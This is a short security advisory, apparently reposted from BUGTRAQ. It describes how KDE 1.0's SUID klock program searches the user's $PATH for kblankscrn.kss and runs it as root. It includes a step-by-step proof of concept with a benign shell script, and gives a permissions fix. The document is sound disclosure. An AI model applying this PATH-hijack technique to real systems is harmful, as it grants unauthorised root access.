On the BUGTRAQ mailing list, HD
Moore writes:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - --( the problem )-- The SUID program klock shipped with KDE 1.0 attempts to execute kblankscrn.kss in the same directory as it. If kblankscrn.kss cannot be executed (missing or mode -x) then klock will search the current user's $PATH for any executable with the same name and execute it as ROOT. If no executable is found in the current path it gives this message: >Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin Default modes for klock and kblankscrn.kss are: - -rwsr-xr-x 1 root root 8760 Mar 12 1998 /opt/kde/bin/klock - -rwsr-xr-x 1 root root 43600 Mar 12 1998 /opt/kde/bin/kblankscrn.kss Systems Affected: any system that runs KDE 1.0 ____________________________________________________ ( the exploit ) This is only exploitable if any of the following occurs: 1) klock is moved to another directory 2) kblankscrn.kss is moved to another directory 3) kblankscrn.kss is not executable To see if you are vulnerable... 1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss 2) login as a normal user 3) create a shell script thats looks like: #!/bin/sh echo Running script as `whoami`! exit 4) name this script to kblankscrn.kss and mv to your home directory. 5) execute /opt/kde/bin/klock, you should see: user@hostname:/home/user> /opt/kde/bin/klock user@hostname:/home/user> Running script as root! 6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss ____________________________________________________ - --( the fix )-- chmod 700 /opt/kde/bin/klock or wait until KDE is updated. the KDE buglist has been notified -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw UmLBRO0nACQcXreodKkWFrpm =rKnX -----END PGP SIGNATURE-----